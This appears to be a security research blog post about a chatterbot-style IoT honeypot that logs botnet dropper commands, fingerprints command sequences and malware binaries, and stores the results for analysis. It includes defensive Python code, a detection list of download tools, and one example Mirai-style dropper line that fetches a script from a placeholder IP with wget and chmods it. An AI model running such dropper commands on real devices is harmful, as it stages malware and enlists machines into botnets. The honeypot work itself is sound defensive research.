Chatting With IoT Bots
After the Mirai attack on Dyn in October 2016, we knew we were facing an inflection point that would reshape the DDoS threat landscape for the coming months or years. The Internet of Things (IoT) would become an important part of that new landscape. After the attack, the inadequate security state of IoT devices such as IP cameras, DVRs and routers, and the unsophisticated nature of the botnets exploiting them, became apparent and drew the attention of many security researchers and reporters. IoT became the playground for many new bots and slowly turned into a battleground where bad bots, white-hat bots and vigilante bots fight over ever-growing numbers of poorly designed and insecure devices.
By December 2016 the number of botnets was growing. Their sizes were reaching beyond the hundreds of thousands, and could have approached 1 million bots had the Deutsche Telekom (DT) takeover attempt in November 2016 not left 900,000 residential internet modems inoperable after the TR-069 exploit. IoT became a major weapon for DDoS, and it is time for us to start measuring the threat and monitoring for new and evolving exploits used by IoT botnets.
Because of the aggressive scanning and harvesting method used by Mirai, and the sheer number of botnets reported in the past nine months, it should not take long for an unprotected, insecure device to be exploited and victimized once it is connected to the internet. Unless your IP address falls within the excluded ranges hardcoded in the original Mirai, which include the U.S. Postal Service, the Department of Defense, the Internet Assigned Numbers Authority (IANA) and IP ranges belonging to Hewlett-Packard and General Electric, any internet connection, wherever it is located, residential or not, should see regular infection attempts by Mirai and friends. In early January we started deploying sensors to get a feel for how bad it actually was. We began with a very simple, custom-developed telnet server listening on port 23 that accepted any username and password combination and presented what looks like a shell or command line interface to the remote peer. While tracking initial connections, we found that less than 10 minutes passed between any two connections from bots trying to compromise our node. That interval has since shrunk to three to five minutes between any two compromise attempts.
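To make the sensor idea concrete, here is a minimal sketch of such a listener in Python. It is not our production code: the names `handle_peer`, `SESSIONS` and `PROMPT` are made up for illustration, telnet option negotiation is ignored, and nothing the peer sends is ever executed.

```python
import asyncio

PROMPT = b"# "   # pretend to be a root shell (illustrative choice)
SESSIONS = []    # in-memory log, one dict per connection (hypothetical)


async def handle_peer(reader, writer):
    """Accept any credentials, then echo a fake prompt after every line."""
    session = {"peer": writer.get_extra_info("peername"), "commands": []}
    SESSIONS.append(session)
    try:
        writer.write(b"login: ")
        await writer.drain()
        session["username"] = (await reader.readline()).strip()
        writer.write(b"Password: ")
        await writer.drain()
        session["password"] = (await reader.readline()).strip()
        # Every username/password combination is accepted.
        writer.write(b"\r\n" + PROMPT)
        await writer.drain()
        while True:
            line = await reader.readline()
            if not line:          # peer closed the connection
                break
            # Record the command; it is never run.
            session["commands"].append(line.strip())
            writer.write(PROMPT)
            await writer.drain()
    except (ConnectionError, ValueError):
        pass                      # reset by peer, or an over-long line
    finally:
        writer.close()


async def serve(host="0.0.0.0", port=2323):
    """Listen until cancelled. Port 23 itself usually needs privileges."""
    server = await asyncio.start_server(handle_peer, host, port)
    async with server:
        await server.serve_forever()
```

Starting it is a matter of calling `asyncio.run(serve())`. The default port 2323 is only there so the sketch runs without root; a real sensor would sit on port 23.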
Given this regular activity, we set out to create a chatterbot (which we conveniently called our IoT honeypot) that would hold a meaningful dialog with the bots, with the goal of getting them to reveal their malware binary. Some bots expect certain responses to the commands they issue, and disappear when they do not get them. Because there was no shortage of new attempts, we were able to iteratively build a consistent dialog with most bots and keep it going until the offending peer showed its true colors and provided us with the location of its malware binary, typically in the form of a wget or ftp/tftp command.
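The dialog logic can be sketched roughly as follows. This is an illustration, not our actual rule set: the reply table, the `respond` and `find_download_commands` helpers, and the "applet not found" reply (modeled on the publicly documented way Mirai-style loaders probe for BusyBox) are all assumptions.

```python
import re

# Commands that reveal a download location (assumed list).
DOWNLOADERS = {"wget", "tftp", "ftpget"}
# Commands answered with silence, as a permissive shell would (assumed).
SILENT_OK = {"enable", "system", "shell", "sh"}
# Applets the fake BusyBox pretends to have (assumed).
PRETEND_APPLETS = DOWNLOADERS | {"cat", "echo", "chmod", "rm"}


def respond(command: str) -> str:
    """Return a canned reply for a known command, an empty reply otherwise."""
    parts = command.split()
    if not parts or parts[0] in SILENT_OK:
        return ""
    # "/bin/busybox TOKEN" probes expect "TOKEN: applet not found".
    if (parts[0].endswith("busybox") and len(parts) == 2
            and parts[1] not in PRETEND_APPLETS):
        return f"{parts[1]}: applet not found"
    return ""  # nothing is executed; unknown input gets no output


def find_download_commands(line: str) -> list:
    """Split a chained command line and keep the segments that download."""
    hits = []
    for segment in re.split(r";|&&|\|\|", line):
        tokens = segment.split()
        # Compare the last path component so "/bin/wget" also matches.
        if any(tok.rsplit("/", 1)[-1] in DOWNLOADERS for tok in tokens):
            hits.append(segment.strip())
    return hits
```

For example, `find_download_commands("cd /tmp; /bin/busybox wget http://198.51.100.7/bins.sh; chmod 777 bins.sh")` keeps only the middle segment, which is the part of the conversation we are after. The address is a documentation-range placeholder.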
As one would expect, most of the dropper command sequences were consistent and showed many similarities, differing only in some randomized tokens and binary download locations. By concatenating and normalizing a bot’s command sequence and hashing the result, we were able to create a fingerprint that uniquely identifies families of similar bots.
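One way to build such a fingerprint is sketched below. The normalization rules are assumptions chosen for illustration (URLs, IPv4 addresses and long uppercase tokens are replaced by placeholders), and SHA-256 is used here only as an example hash; the function names are hypothetical.

```python
import hashlib
import re

URL_RE = re.compile(r"(?:https?|ftp|tftp)://\S+")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
# Assumption: randomized probe tokens are runs of 5+ uppercase letters/digits.
TOKEN_RE = re.compile(r"\b[A-Z0-9]{5,}\b")


def normalize(command: str) -> str:
    """Replace the parts that vary between bots of the same family."""
    command = URL_RE.sub("<url>", command.strip())
    command = IP_RE.sub("<ip>", command)
    command = TOKEN_RE.sub("<token>", command)
    return re.sub(r"\s+", " ", command)  # collapse whitespace


def sequence_fingerprint(commands) -> str:
    """Concatenate the normalized commands and hash the result."""
    joined = "\n".join(normalize(c) for c in commands if c.strip())
    return hashlib.sha256(joined.encode("utf-8")).hexdigest()
```

With these rules, two sessions that differ only in their probe token and download host produce the same fingerprint, while a session that issues different commands does not.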
Once the bots felt confident enough to share the location of the malware binary with our honeypot, we added functionality to fetch the binary and hold it in memory so that we can hash its contents into a malware fingerprint. Fingerprints that are new to the honeypot are analyzed further by looking up their MD5 and SHA-256 hashes on virustotal.com; if the malware turns out to be new or unknown, it is submitted to VirusTotal and we have a good candidate for further study. The file fingerprints are a great tool for identifying bots whose behavior stays the same while their malware binaries evolve over time, such as Hajime. The command sequence fingerprint keeps matching that of Hajime, but the binary file fingerprints change over time, which allows us to track new versions delivered by the same bot.
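The fetch-and-hash step could look something like the sketch below. The size cap, timeout, scheme allowlist and function names are assumptions for illustration, and the VirusTotal lookup is deliberately left out. The payload is only ever held as bytes; it is never written to disk or executed.

```python
import hashlib
import urllib.request
from urllib.parse import urlsplit

MAX_BYTES = 5 * 1024 * 1024               # assumed cap on payload size
ALLOWED_SCHEMES = {"http", "https", "ftp"}  # never follow file:// and the like


def fetch_in_memory(url: str, max_bytes: int = MAX_BYTES,
                    timeout: float = 10.0) -> bytes:
    """Download a payload into memory, refusing odd schemes and huge files."""
    if urlsplit(url).scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"refusing to fetch {url!r}")
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        data = resp.read(max_bytes + 1)   # read one extra byte to detect overflow
    if len(data) > max_bytes:
        raise ValueError("payload exceeds size cap")
    return data


def hash_payload(data: bytes) -> dict:
    """Compute the file fingerprints used to recognize a known binary."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
    }
```

A typical call would be `hash_payload(fetch_in_memory(url))`, with the resulting hashes compared against those the honeypot has already seen.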
Information about the remote peer, including GeoIP data, the original command sequence, the command sequence fingerprint and the malware binary fingerprint, is stored in MongoDB for analysis. By querying this data we are able to track the history and evolution of existing and new bots that try to compromise our honeypots. Over time we added support for new protocols and exploits such as the TR-064/069 server and the NewNTPServer exploit, the HTTP GoAhead RCE exploits, and general SSH, simulating real devices as closely as possible to trick the bots into believing they have a real new victim to work with.
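As a rough idea of what one stored record might contain, here is a sketch of a document built in Python. The field names and the `Observation` class are hypothetical, not our actual schema, and the values in the usage note are placeholders.

```python
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from typing import Dict, List, Optional


@dataclass
class Observation:
    """One compromise attempt as seen by the honeypot (hypothetical schema)."""
    peer_ip: str
    protocol: str                     # e.g. "telnet", "ssh", "tr-069"
    commands: List[str]               # original command sequence
    sequence_fingerprint: str         # hash of the normalized sequence
    binary_md5: Optional[str] = None  # None when no binary was fetched
    binary_sha256: Optional[str] = None
    geoip: Dict[str, str] = field(default_factory=dict)
    seen_at: datetime = field(
        default_factory=lambda: datetime.now(timezone.utc))


def to_document(obs: Observation) -> dict:
    """Convert to a plain dict, the shape a MongoDB driver expects."""
    return asdict(obs)

# With the pymongo driver installed, storing it would be along the lines of:
#   collection.insert_one(to_document(obs))
```

For instance, `to_document(Observation("198.51.100.7", "telnet", ["enable"], "ab12"))` yields a dict whose `sequence_fingerprint` field can later be used to group all sessions of one bot family.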
The most recent addition to our IoT honeypot infrastructure is an ELK stack (Elasticsearch, Logstash, Kibana) that gives us real-time dashboards and insight into IoT botnet activity in our honeypots.
Using a chatterbot pattern for the honeypot gives us a safer and more robust detection tool with a lot of flexibility for fingerprinting and analyzing the activity. None of the bot’s commands are actually executed by the honeypot; only known, pre-programmed requests generate pre-programmed responses. Because of the high number of infection attempts per hour, this design pattern worked out well for studying and gathering data on IoT threats and botnets. The honeypot is not comparable to a more traditional telnet/SSH honeypot, in the sense that it does not allow for unanticipated or non-programmed commands and responses. Other honeypots expose real shell functionality and allow more creativity from the attacking peer, and in doing so provide a great method for studying new attacker behavior. The IoT honeypot does not provide such freedom, and while it is able to discover new kinds of bots and dropper attempts, it requires work to program and simulate new commands, protocols and exploits. For the purposes of our study, the honeypot gives us the tools and statistics we need to better understand and appreciate the threat landscape shaped by IoT botnets.